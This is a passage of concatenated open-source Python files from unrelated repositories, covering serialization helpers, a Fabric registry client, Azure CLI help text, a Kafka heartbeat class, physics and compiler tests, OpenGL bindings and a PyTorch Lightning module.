If stream is None, return the produced string instead.
OrderedDict reference: http://stackoverflow.com/a/21912744
default_flow_style reference: http://stackoverflow.com/a/18210750
    :param obj: python object to be serialized
    :param stream: to be serialized to
    :param dumper_cls: base Dumper class to extend.
:param kwargs: arguments to pass to to_dict
:return: stream if provided, string if stream is None
"""
class OrderedDumper(dumper_cls):
pass
def dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
data.items())
OrderedDumper.add_representer(OrderedDict, dict_representer)
obj_dict = to_dict(obj, **kwargs)
return yaml.dump(obj_dict, stream, OrderedDumper,
default_flow_style=default_flow_style)
def from_yaml(stream, cls=None, loader_cls=yaml.Loader,
object_pairs_hook=OrderedDict, **extras):
"""
Convert a YAML stream into a class via the OrderedLoader class.
"""
class OrderedLoader(loader_cls):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
yaml_dict = yaml.load(stream, OrderedLoader) or {}
yaml_dict.update(extras)
return cls(**yaml_dict) if cls else yaml_dict
def to_json(obj, indent=4, sort_keys=True, **kwargs):
"""
:param obj: object to convert to dictionary and then output to json
:param indent: indent json by number of spaces
:param sort_keys: sort json output by key if true
:param kwargs: arguments to pass to to_dict
:return: json string
"""
obj_dict = to_dict(obj, **kwargs)
return json.dumps(obj_dict, indent=indent, sort_keys=sort_keys)
def from_json(stream, cls=None, object_pairs_hook=OrderedDict, **extras):
"""
Convert a JSON string or stream into specified class.
"""
stream = stream.read() if hasattr(stream, 'read') else stream
json_dict = json.loads(stream, object_pairs_hook=object_pairs_hook)
if extras:
json_dict.update(extras) # pragma: no cover
return to_model(cls, json_dict) if cls else json_dict
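# Illustrative round-trip (not part of the original module); `Person` stands in for
# any related model class defined by the caller:
#
#     json_str = to_json(person)                  # model -> JSON string
#     same_person = from_json(json_str, Person)   # JSON string -> model instance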
|
vaas-app/src/vaas/purger/urls.py | allegro/vaas | 251 | 11187542 | # -*- coding: utf-8 -*-
from django.conf.urls import url
from vaas.purger.views import purge_view
urlpatterns = [
url(r'^$', purge_view, name='purge_view'),
]
|
sdk/avalon_sdk/connector/blockchains/fabric/fabric_worker_registry_list.py | ikegawa-koshi/avalon | 127 | 11187580 | # Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from utility.hex_utils import is_valid_hex_str
import binascii
from os import environ
from utility.hex_utils import byte_array_to_hex_str
from avalon_sdk.connector.interfaces.worker_registry_list \
import WorkerRegistryList
from avalon_sdk.registry.registry_status import RegistryStatus
from avalon_sdk.connector.blockchains.fabric.fabric_wrapper \
import FabricWrapper
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(message)s", level=logging.INFO)
class FabricWorkerRegistryListImpl(WorkerRegistryList):
"""
    This class provides APIs to read/write registry entries of workers,
    which are stored in the Hyperledger Fabric blockchain.
"""
def __init__(self, config):
"""
Parameters:
config Dictionary containing Fabric-specific parameters.
"""
self.__fabric_wrapper = None
# Chain code name
self.CHAIN_CODE = 'registry'
if config is not None:
self.__fabric_wrapper = FabricWrapper(config)
else:
raise Exception("config is none")
def registry_lookup(self, app_type_id=None):
"""
Registry Lookup identified by application type ID
Parameters:
app_type_id Application type ID to lookup in the registry
Returns:
Tuple containing totalCount, lookupTag, and ids on success:
totalCount Total number of entries matching a specified lookup
criteria. If this number is larger than the size of the
ids array, the caller should use the lookupTag to call
registry_lookup_next to retrieve the rest of the IDs
lookupTag Optional parameter. If it is returned, it means that
there are more matching registry IDs that can be
retrieved by calling the function registry_lookup_next
with this tag as an input parameter.
ids Array of the registry organization ids that match the
input parameters.
Returns None on error.
"""
if (self.__fabric_wrapper is not None):
if app_type_id is not None:
if is_valid_hex_str(binascii.hexlify(app_type_id).decode(
"utf8")):
params = []
params.append(byte_array_to_hex_str(app_type_id))
lookupResult = \
self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryLookUp',
                            params)
                    return lookupResult
else:
logging.info(
"Invalid application type id {}".format(app_type_id))
return None
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_retrieve(self, org_id):
"""
Retrieve registry information identified by the organization ID.
Parameters:
org_id Organization ID to lookup
Returns:
Tuple containing following on success:
uri String defines a URI for this registry that
supports the Off-Chain Worker Registry JSON RPC
API. It will be None for the proxy model
sc_addr Fabric address for worker registry
smart contract address
application_type_ids List of application ids (array of byte[])
status Status of the registry
Returns None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.info("Invalid Org id {}".format(org_id))
return None
else:
params = []
params.append(byte_array_to_hex_str(org_id))
registryDetails = \
self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryRetrieve',
params
)
return registryDetails
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_lookup_next(self, app_type_id, lookup_tag):
"""
Get additional registry lookup results.
This function is called to retrieve additional results of the
Registry lookup initiated by the registry_lookup call.
Parameters:
app_type_id Application type ID that has to be
supported by the workers retrieved
lookup_tag Returned by a previous call to either this function
or to registry_lookup
Returns:
Outputs a tuple on success containing the following:
total_count Total number of entries matching the lookup
criteria. If this number is larger than the number
of IDs returned so far, the caller should use
lookup_tag to call registry_lookup_next to
retrieve the rest of the IDs
new_lookup_tag is an optional parameter. If it is returned, it means
that there are more matching registry IDs that can be
retrieved by calling this function again with this tag
as an input parameter
ids Array of the registry IDs that match the input
parameters
Returns None on error.
"""
if (self.__fabric_wrapper is not None):
if is_valid_hex_str(binascii.hexlify(app_type_id).decode("utf8")):
params = []
params.append(byte_array_to_hex_str(app_type_id))
params.append(lookup_tag)
lookupResult = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryLookUpNext',
                    params)
                return lookupResult
else:
logging.info(
"Invalid application type id {}".format(app_type_id))
return None
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_add(self, org_id, uri, sc_addr, app_type_ids):
"""
Add a new registry.
Parameters:
org_id bytes[] identifies organization that hosts the
registry, e.g. a bank in the consortium or an
anonymous entity
uri String defining a URI for this registry that
supports the Off-Chain Worker Registry
JSON RPC API
sc_addr bytes[] defines a Fabric chain code name that
runs the Worker Registry Smart Contract API
smart contract for this registry
app_type_ids []bytes[] is an optional parameter that defines
application types supported by the worker
managed by the registry
Returns:
Transaction receipt on success or None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.info("Invalid Org id {}".format(org_id))
return None
if (sc_addr is not None and is_valid_hex_str(
binascii.hexlify(sc_addr).decode("utf8")) is False):
logging.info("Invalid smart contract name {}")
return None
if (not uri):
logging.info("Empty uri {}".format(uri))
return None
app_ids = []
for aid in app_type_ids:
if (is_valid_hex_str(binascii.hexlify(aid).decode("utf8"))
is False):
logging.info("Invalid application id {}".format(aid))
return None
else:
app_ids.append(byte_array_to_hex_str(aid))
params = []
params.append(byte_array_to_hex_str(org_id))
params.append(uri)
params.append(byte_array_to_hex_str(sc_addr))
params.append(','.join(app_ids))
txn_status = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryAdd',
params)
return txn_status
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_update(self, org_id, uri, sc_addr, app_type_ids):
"""
Update a registry.
Parameters:
org_id bytes[] identifies organization that hosts the
registry, e.g. a bank in the consortium or an
anonymous entity
uri string that defines a URI for this registry that
supports the Off-Chain Worker Registry
JSON RPC API
sc_addr bytes[] defines a Fabric chain code name that
runs the Worker Registry Smart Contract API
smart contract for this registry
app_type_ids []bytes[] is an optional parameter that defines
application types supported by the worker
managed by the registry
Returns:
Transaction receipt on success or None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.error("Invalid Org id {}".format(org_id))
return None
if (sc_addr is not None and is_valid_hex_str(
binascii.hexlify(sc_addr).decode("utf8")) is False):
logging.error(
"Invalid smart contract address {}".format(sc_addr))
return None
if (not uri):
logging.error("Empty uri {}".format(uri))
return None
app_ids = []
for aid in app_type_ids:
if (is_valid_hex_str(binascii.hexlify(aid).decode("utf8"))
is False):
logging.error("Invalid application id {}".format(aid))
return None
else:
app_ids.append(byte_array_to_hex_str(aid))
params = []
params.append(byte_array_to_hex_str(org_id))
params.append(uri)
params.append(byte_array_to_hex_str(sc_addr))
params.append(','.join(app_ids))
txn_status = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryUpdate',
params)
return txn_status
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_set_status(self, org_id, status):
"""
Set registry status.
Parameters:
org_id bytes[] identifies organization that hosts the
registry, e.g. a bank in the consortium or an
anonymous entity
status Defines the registry status to set.
The currently defined values are:
1 - the registry is active
2 - the registry is temporarily "off-line"
3 - the registry is decommissioned
Returns:
Transaction receipt on success or None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.info("Invalid Org id {}".format(org_id))
return None
if not isinstance(status, RegistryStatus):
logging.info("Invalid registry status {}".format(status))
return None
params = []
params.append(byte_array_to_hex_str(org_id))
params.append(str(status))
txn_status = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registrySetStatus',
params)
return txn_status
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
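# Illustrative usage sketch (not part of the original module); the Fabric config,
# URI and 32-byte ids below are placeholders only:
#
#     registry_list = FabricWorkerRegistryListImpl(fabric_config)
#     receipt = registry_list.registry_add(
#         org_id=b'\x01' * 32,
#         uri='http://avalon-listener:1947',
#         sc_addr=b'\x02' * 32,
#         app_type_ids=[b'\x11' * 32])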
|
src/connection-monitor-preview/azext_connection_monitor_preview/_help.py | Mannan2812/azure-cli-extensions | 207 | 11187612 | # coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.help_files import helps # pylint: disable=unused-import
helps['network watcher connection-monitor create'] = """
type: command
short-summary: Create a connection monitor.
long-summary: |
        This extension allows creating V1 and V2 versions of connection monitor.
        V1 connection monitor supports a single source and destination endpoint, which comes with the usual V1 argument groups.
        V2 connection monitor supports multiple endpoints and several test protocols, which come with V2 argument groups.
parameters:
- name: --source-resource
short-summary: >
Currently only Virtual Machines are supported.
- name: --dest-resource
short-summary: >
Currently only Virtual Machines are supported.
examples:
- name: Create a connection monitor for a virtual machine.
text: |
az network watcher connection-monitor create -g MyResourceGroup -n MyConnectionMonitorName \\
--source-resource MyVM
- name: Create a V2 connection monitor
text: >
az network watcher connection-monitor create
--name MyV2ConnectionMonitor
--endpoint-source-name "vm01"
--endpoint-source-resource-id MyVM01ResourceID
--endpoint-dest-name bing
--endpoint-dest-address bing.com
--test-config-name TCPTestConfig
--protocol Tcp
--tcp-port 2048
"""
helps['network watcher connection-monitor endpoint'] = """
type: group
short-summary: Manage endpoint of a connection monitor
"""
helps['network watcher connection-monitor endpoint add'] = """
type: command
short-summary: Add an endpoint to a connection monitor
examples:
- name: Add an endpoint as destination
text: >
az network watcher connection-monitor endpoint add
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--address "bing.com"
--dest-test-groups DefaultTestGroup
- name: Add an endpoint as source
text: >
az network watcher connection-monitor endpoint add
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--resource-id MyVMResourceID
--source-test-groups DefaultTestGroup
- name: Add an endpoint with filter
text: >
az network watcher connection-monitor endpoint add
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--resource-id MyLogAnalysisWorkSpaceID
--source-test-groups DefaultTestGroup
--filter-type Include
--filter-item type=AgentAddress address=npmuser
--filter-item type=AgentAddress address=pypiuser
"""
helps['network watcher connection-monitor endpoint remove'] = """
type: command
short-summary: Remove an endpoint from a connection monitor
examples:
- name: Remove endpoint from all test groups of a connection monitor
text: >
az network watcher connection-monitor endpoint remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
- name: Remove endpoint from two test groups of a connection monitor
text: >
az network watcher connection-monitor endpoint remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--test-groups DefaultTestGroup HealthCheckTestGroup
"""
helps['network watcher connection-monitor endpoint show'] = """
type: command
short-summary: Show an endpoint from a connection monitor
"""
helps['network watcher connection-monitor endpoint list'] = """
type: command
short-summary: List all endpoints form a connection monitor
"""
helps['network watcher connection-monitor test-configuration'] = """
type: group
short-summary: Manage test configuration of a connection monitor
"""
helps['network watcher connection-monitor test-configuration add'] = """
type: command
short-summary: Add a test configuration to a connection monitor
examples:
- name: Add a test configuration with HTTP supported
text: >
az network watcher connection-monitor test-configuration add
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestConfiguration
--test-groups DefaultTestGroup
--protocol Http
--http-request-header name=Host value=bing.com
--http-request-header name=UserAgent value=Edge
- name: Add a test configuration with TCP supported
text: >
az network watcher connection-monitor test-configuration add
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestConfiguration
--test-groups TCPTestGroup DefaultTestGroup
--protocol Tcp
--tcp-port 4096
"""
helps['network watcher connection-monitor test-configuration remove'] = """
type: command
short-summary: Remove a test configuration from a connection monitor
examples:
- name: Remove a test configuration from all test groups of a connection monitor
text: >
az network watcher connection-monitor test-configuration remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyTCPTestConfiguration
- name: Remove a test configuration from two test groups of a connection monitor
text: >
az network watcher connection-monitor test-configuration remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestConfiguration
--test-groups HTTPTestGroup DefaultTestGroup
"""
helps['network watcher connection-monitor test-configuration show'] = """
type: command
short-summary: Show a test configuration from a connection monitor
"""
helps['network watcher connection-monitor test-configuration list'] = """
type: command
short-summary: List all test configurations of a connection monitor
"""
helps['network watcher connection-monitor test-group'] = """
type: group
short-summary: Manage a test group of a connection monitor
"""
helps['network watcher connection-monitor test-group add'] = """
type: command
    short-summary: Add a test group along with newly added/existing endpoint and test configuration to a connection monitor
examples:
- name: Add a test group along with existing endpoint and test configuration via their names
text: >
az network watcher connection-monitor test-group add
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestGroup
--endpoint-source-name MySourceEndpoint
--endpoint-dest-name MyDestinationEndpoint
--test-config-name MyTestConfiguration
      - name: Add a test group along with a newly added source endpoint and existing test configuration via its name
text: >
az network watcher connection-monitor test-group add
--connection-monitor MyConnectionMonitor
--location westus
--name MyAccessibilityTestGroup
--endpoint-source-name MySourceEndpoint
--endpoint-source-resource-id MyLogAnalysisWorkspaceID
--endpoint-dest-name MyExistingDestinationEndpoint
--test-config-name MyExistingTestConfiguration
      - name: Add a test group along with newly added endpoints and test configuration
text: >
az network watcher connection-monitor test-group add
--connection-monitor MyConnectionMonitor
--location westus
--name MyAccessibilityTestGroup
--endpoint-source-name MySourceEndpoint
--endpoint-source-resource-id MyVMResourceID
--endpoint-dest-name bing
--endpoint-dest-address bing.com
--test-config-name MyNewTestConfiguration
--protocol Tcp
--tcp-port 4096
"""
helps['network watcher connection-monitor test-group remove'] = """
type: command
short-summary: Remove test group from a connection monitor
"""
helps['network watcher connection-monitor test-group show'] = """
type: command
short-summary: Show a test group of a connection monitor
"""
helps['network watcher connection-monitor test-group list'] = """
type: command
short-summary: List all test groups of a connection monitor
"""
helps['network watcher connection-monitor output'] = """
type: group
short-summary: Manage output of connection monitor
"""
helps['network watcher connection-monitor output add'] = """
type: command
short-summary: Add an output to a connection monitor
"""
helps['network watcher connection-monitor output remove'] = """
type: command
short-summary: Remove all outputs from a connection monitor
"""
helps['network watcher connection-monitor output list'] = """
type: command
short-summary: List all output from a connection monitor
"""
|
kafka/coordinator/heartbeat.py | timgates42/kafka-python | 4,389 | 11187616 | from __future__ import absolute_import, division
import copy
import time
class Heartbeat(object):
DEFAULT_CONFIG = {
'group_id': None,
'heartbeat_interval_ms': 3000,
'session_timeout_ms': 10000,
'max_poll_interval_ms': 300000,
'retry_backoff_ms': 100,
}
def __init__(self, **configs):
self.config = copy.copy(self.DEFAULT_CONFIG)
for key in self.config:
if key in configs:
self.config[key] = configs[key]
if self.config['group_id'] is not None:
assert (self.config['heartbeat_interval_ms']
<= self.config['session_timeout_ms']), (
'Heartbeat interval must be lower than the session timeout')
self.last_send = -1 * float('inf')
self.last_receive = -1 * float('inf')
self.last_poll = -1 * float('inf')
self.last_reset = time.time()
self.heartbeat_failed = None
def poll(self):
self.last_poll = time.time()
def sent_heartbeat(self):
self.last_send = time.time()
self.heartbeat_failed = False
def fail_heartbeat(self):
self.heartbeat_failed = True
def received_heartbeat(self):
self.last_receive = time.time()
def time_to_next_heartbeat(self):
"""Returns seconds (float) remaining before next heartbeat should be sent"""
time_since_last_heartbeat = time.time() - max(self.last_send, self.last_reset)
if self.heartbeat_failed:
delay_to_next_heartbeat = self.config['retry_backoff_ms'] / 1000
else:
delay_to_next_heartbeat = self.config['heartbeat_interval_ms'] / 1000
return max(0, delay_to_next_heartbeat - time_since_last_heartbeat)
def should_heartbeat(self):
return self.time_to_next_heartbeat() == 0
def session_timeout_expired(self):
last_recv = max(self.last_receive, self.last_reset)
return (time.time() - last_recv) > (self.config['session_timeout_ms'] / 1000)
def reset_timeouts(self):
self.last_reset = time.time()
self.last_poll = time.time()
self.heartbeat_failed = False
def poll_timeout_expired(self):
return (time.time() - self.last_poll) > (self.config['max_poll_interval_ms'] / 1000)
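# Illustrative sketch (not part of the original module): coordinator code typically
# drives this helper roughly as follows
#
#     hb = Heartbeat(group_id='my-group')
#     hb.poll()                     # record a user poll()
#     if hb.should_heartbeat():
#         hb.sent_heartbeat()       # mark the heartbeat request as sent
#     # ...then hb.received_heartbeat() or hb.fail_heartbeat() on the response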
|
tools/test_idf_py/test_idf_extensions/test_ext/__init__.py | DCNick3/esp-idf | 8,747 | 11187646 | from .test_extension import action_extensions # noqa: F401
|
malspider_django/dashboard/forms.py | andrewhenke/malspider | 453 | 11187681 | from django import forms
class LoginForm(forms.Form):
username = forms.CharField(label='Username', max_length=100, widget=forms.TextInput(attrs={'class':'form-control', 'placeholder':'username'}))
password = forms.CharField(label='Password', widget=forms.PasswordInput(attrs={'class':'form-control', 'placeholder':'password'}), max_length=200)
|
tests/spinful_fermion_tensor_test.py | anton-buyskikh/QuSpin | 195 | 11187684 | <filename>tests/spinful_fermion_tensor_test.py
from __future__ import print_function, division
import sys,os
quspin_path = os.path.join(os.getcwd(),"../")
sys.path.insert(0,quspin_path)
from quspin.operators import hamiltonian
from quspin.basis import tensor_basis,spinless_fermion_basis_1d,spinful_fermion_basis_1d # Hilbert spaces
import numpy as np # general math functions
from itertools import product
#
##### setting parameters for simulation
# physical parameters
J = 1.0 # hopping strength
U = 5.0 # interaction strength
for L in range(1,8,1):
##### create model
# define site-coupling lists
hop_right = [[-J,i,i+1] for i in range(L-1)] # hopping to the right OBC
hop_left = [[J,i,i+1] for i in range(L-1)] # hopping to the left OBC
int_list = [[U,i,i] for i in range(L)] # onsite interaction
# create static lists
static= [
["+-|", hop_left], # up hop left
["-+|", hop_right], # up hop right
["|+-", hop_left], # down hop left
["|-+", hop_right], # down hop right
["n|n", int_list], # onsite interaction
]
no_checks = dict(check_pcon=False,check_symm=False,check_herm=False,dtype=np.float64)
for N_up, N_down in product(range(L+1),range(L+1)):
print("L=%s, Nup=%s, Ndown=%s" %(L,N_up,N_down) )
###### create the basis
# build the two bases to tensor together to spinful fermions
basis_up = spinless_fermion_basis_1d(L,Nf=N_up) # up basis
basis_down = spinless_fermion_basis_1d(L,Nf=N_down) # down basis
basis_tensor = tensor_basis(basis_up,basis_down) # spinful fermions
basis_spinful = spinful_fermion_basis_1d(L,Nf=(N_up,N_down))
H_tensor = hamiltonian(static,[],basis=basis_tensor,**no_checks)
H_spinful = hamiltonian(static,[],basis=basis_spinful,**no_checks)
E_tensor,V_tensor=H_tensor.eigh()
E_spinful,V_spinful=H_spinful.eigh()
np.testing.assert_allclose(E_tensor-E_spinful,0.0,atol=1E-5,err_msg='Failed tensor and spinfil energies comparison!')
#np.testing.assert_allclose( (H_tensor-H_spinful).toarray(),0.0,atol=1E-5,err_msg='Failed tensor and spinfil energies comparison!')
|
test/common/parameterized_utils.py | parmeet/text | 3,172 | 11187685 | <gh_stars>1000+
import json
from parameterized import param
import os.path
_TEST_DIR_PATH = os.path.realpath(
os.path.join(os.path.dirname(__file__), '..'))
def get_asset_path(*paths):
"""Return full path of a test asset"""
return os.path.join(_TEST_DIR_PATH, 'asset', *paths)
def load_params(*paths):
with open(get_asset_path(*paths), 'r') as file:
return [param(json.loads(line)) for line in file]
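# Illustrative usage (not part of the original helpers); the asset file name is
# hypothetical:
#
#     @parameterized.expand(load_params('models', 'cases.jsonl'))
#     def test_case(self, case):
#         ...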
|
scale/product/test/utils.py | kaydoh/scale | 121 | 11187710 | """Defines utility methods for testing products"""
from __future__ import unicode_literals
import hashlib
import django.utils.timezone as timezone
from job.test import utils as job_utils
from product.models import FileAncestryLink
from storage.models import ScaleFile
from storage.test import utils as storage_utils
def create_file_link(ancestor=None, descendant=None, job=None, job_exe=None, recipe=None, batch=None):
"""Creates a file ancestry link model for unit testing
:returns: The file ancestry link model
:rtype: :class:`product.models.FileAncestryLink`
"""
if not job:
if descendant and descendant.job:
job = descendant.job
else:
job = job_utils.create_job()
if not job_exe:
if descendant and descendant.job_exe:
job_exe = descendant.job_exe
else:
job_exe = job_utils.create_job_exe(job_type=job.job_type, job=job)
return FileAncestryLink.objects.create(ancestor=ancestor, descendant=descendant, job=job, job_exe=job_exe,
recipe=recipe, batch=batch)
def create_product(job_exe=None, workspace=None, has_been_published=False, is_published=False, uuid=None,
file_name='my_test_file.txt', file_path='/file/path/my_test_file.txt', media_type='text/plain',
file_size=100, countries=None, is_superseded=False, superseded=None):
"""Creates a product file model for unit testing
:returns: The product model
:rtype: :class:`storage.models.ScaleFile`
"""
if not job_exe:
job_exe = job_utils.create_job_exe()
if not workspace:
workspace = storage_utils.create_workspace()
if not uuid:
builder = hashlib.md5()
builder.update(str(job_exe.job.job_type.id))
builder.update(file_name)
uuid = builder.hexdigest()
if is_superseded and not superseded:
superseded = timezone.now()
product_file = ScaleFile.objects.create(file_type='PRODUCT', job_exe=job_exe, job=job_exe.job,
job_type=job_exe.job.job_type, has_been_published=has_been_published,
is_published=is_published, uuid=uuid, file_name=file_name,
media_type=media_type, file_size=file_size, file_path=file_path,
workspace=workspace, is_superseded=is_superseded, superseded=superseded)
if countries:
product_file.countries = countries
product_file.save()
return product_file
|
env/Lib/site-packages/OpenGL/GLES2/APPLE/texture_packed_float.py | 5gconnectedbike/Navio2 | 210 | 11187726 | '''OpenGL extension APPLE.texture_packed_float
This module customises the behaviour of the
OpenGL.raw.GLES2.APPLE.texture_packed_float to provide a more
Python-friendly API
Overview (from the spec)
This extension adds two new 3-component floating-point texture formats
that fit within a single 32-bit word called R11F_G11F_B10F and RGB9_E5
The first RGB format, R11F_G11F_B10F, stores 5 bits of biased exponent
per component in the same manner as 16-bit floating-point formats, but
rather than 10 mantissa bits, the red, green, and blue components have
6, 6, and 5 bits respectively. Each mantissa is assumed to have an
implied leading one except in the denorm exponent case. There is no
sign bit so only non-negative values can be represented. Positive
	infinity, positive denorms, and positive NaN values are representable.
The value of the fourth component returned by a texture fetch is always
1.0.
The second RGB format, RGB9_E5, stores a single 5-bit exponent (biased
up by 15) and three 9-bit mantissas for each respective component.
There is no sign bit so all three components must be non-negative.
The fractional mantissas are stored without an implied 1 to the left
of the decimal point. Neither infinity nor not-a-number (NaN) are
representable in this shared exponent format.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/APPLE/texture_packed_float.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.APPLE.texture_packed_float import *
from OpenGL.raw.GLES2.APPLE.texture_packed_float import _EXTENSION_NAME
def glInitTexturePackedFloatAPPLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
rpython/jit/metainterp/optimizeopt/test/test_intdiv.py | nanjekyejoannah/pypy | 381 | 11187738 | <reponame>nanjekyejoannah/pypy<gh_stars>100-1000
import sys
import py
from hypothesis import given, strategies
from rpython.jit.metainterp.optimizeopt.intdiv import magic_numbers, LONG_BIT
from rpython.jit.metainterp.optimizeopt.intdiv import division_operations
from rpython.jit.metainterp.optimizeopt.intdiv import modulo_operations
from rpython.jit.metainterp.optimizeopt.intdiv import unsigned_mul_high
from rpython.jit.metainterp.history import ConstInt
from rpython.jit.metainterp.resoperation import InputArgInt
from rpython.jit.metainterp.executor import execute
not_power_of_two = (strategies.integers(min_value=3, max_value=sys.maxint)
.filter(lambda m: (m & (m - 1)) != 0))
@given(strategies.integers(min_value=0, max_value=sys.maxint),
not_power_of_two)
def test_magic_numbers(n, m):
k, i = magic_numbers(m)
k = int(k) # and no longer r_uint, with wrap-around semantics
a = (n * k) >> (LONG_BIT + i)
assert a == n // m
@given(strategies.integers(min_value=0, max_value=2*sys.maxint+1),
strategies.integers(min_value=0, max_value=2*sys.maxint+1))
def test_unsigned_mul_high(a, b):
c = unsigned_mul_high(a, b)
assert c == ((a * b) >> LONG_BIT)
@given(strategies.integers(min_value=-sys.maxint-1, max_value=sys.maxint),
not_power_of_two,
strategies.booleans())
def test_division_operations(n, m, known_nonneg):
if n < 0:
known_nonneg = False
n_box = InputArgInt()
ops = division_operations(n_box, m, known_nonneg)
constants = {n_box: ConstInt(n)}
for op in ops:
argboxes = op.getarglist()
constantboxes = [constants.get(box, box) for box in argboxes]
res = execute(None, None, op.getopnum(), None, *constantboxes)
constants[op] = ConstInt(res)
assert constants[op].getint() == n // m
@given(strategies.integers(min_value=-sys.maxint-1, max_value=sys.maxint),
not_power_of_two,
strategies.booleans())
def test_modulo_operations(n, m, known_nonneg):
if n < 0:
known_nonneg = False
n_box = InputArgInt()
ops = modulo_operations(n_box, m, known_nonneg)
constants = {n_box: ConstInt(n)}
for op in ops:
argboxes = op.getarglist()
constantboxes = [constants.get(box, box) for box in argboxes]
res = execute(None, None, op.getopnum(), None, *constantboxes)
constants[op] = ConstInt(res)
assert constants[op].getint() == n % m
|
bag/simulation/__init__.py | felixonmars/BAG_framework | 123 | 11187748 | <reponame>felixonmars/BAG_framework
# -*- coding: utf-8 -*-
"""This package defines various utility classes for running simulations and data post-processing.
""" |
special/kfold/model/model_interface.py | dumpmemory/pytorch-lightning-template | 257 | 11187749 | # Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import torch
import importlib
from torch.nn import functional as F
import torch.optim.lr_scheduler as lrs
import pytorch_lightning as pl
class MInterface(pl.LightningModule):
def __init__(self, model_name, loss, lr, **kargs):
super().__init__()
self.save_hyperparameters()
self.load_model()
self.configure_loss()
def forward(self, img):
return self.model(img)
def training_step(self, batch, batch_idx):
img, labels, filename = batch
out = self(img)
loss = self.loss_function(out, labels)
self.log('loss', loss, on_step=True, on_epoch=True, prog_bar=True)
return loss
def validation_step(self, batch, batch_idx):
img, labels, filename = batch
out = self(img)
loss = self.loss_function(out, labels)
label_digit = labels.argmax(axis=1)
out_digit = out.argmax(axis=1)
correct_num = sum(label_digit == out_digit).cpu().item()
self.log('val_loss', loss, on_step=False, on_epoch=True, prog_bar=True)
self.log('val_acc', correct_num/len(out_digit),
on_step=False, on_epoch=True, prog_bar=True)
return (correct_num, len(out_digit))
def test_step(self, batch, batch_idx):
# Here we just reuse the validation_step for testing
return self.validation_step(batch, batch_idx)
def on_validation_epoch_end(self):
# Make the Progress Bar leave there
self.print('')
def configure_optimizers(self):
if hasattr(self.hparams, 'weight_decay'):
weight_decay = self.hparams.weight_decay
else:
weight_decay = 0
optimizer = torch.optim.Adam(
self.parameters(), lr=self.hparams.lr, weight_decay=weight_decay)
if self.hparams.lr_scheduler is None:
return optimizer
else:
if self.hparams.lr_scheduler == 'step':
scheduler = lrs.StepLR(optimizer,
step_size=self.hparams.lr_decay_steps,
gamma=self.hparams.lr_decay_rate)
elif self.hparams.lr_scheduler == 'cosine':
scheduler = lrs.CosineAnnealingLR(optimizer,
T_max=self.hparams.lr_decay_steps,
eta_min=self.hparams.lr_decay_min_lr)
else:
raise ValueError('Invalid lr_scheduler type!')
return [optimizer], [scheduler]
def configure_loss(self):
loss = self.hparams.loss.lower()
if loss == 'mse':
self.loss_function = F.mse_loss
elif loss == 'l1':
self.loss_function = F.l1_loss
elif loss == 'bce':
self.loss_function = F.binary_cross_entropy
else:
raise ValueError("Invalid Loss Type!")
def load_model(self):
name = self.hparams.model_name
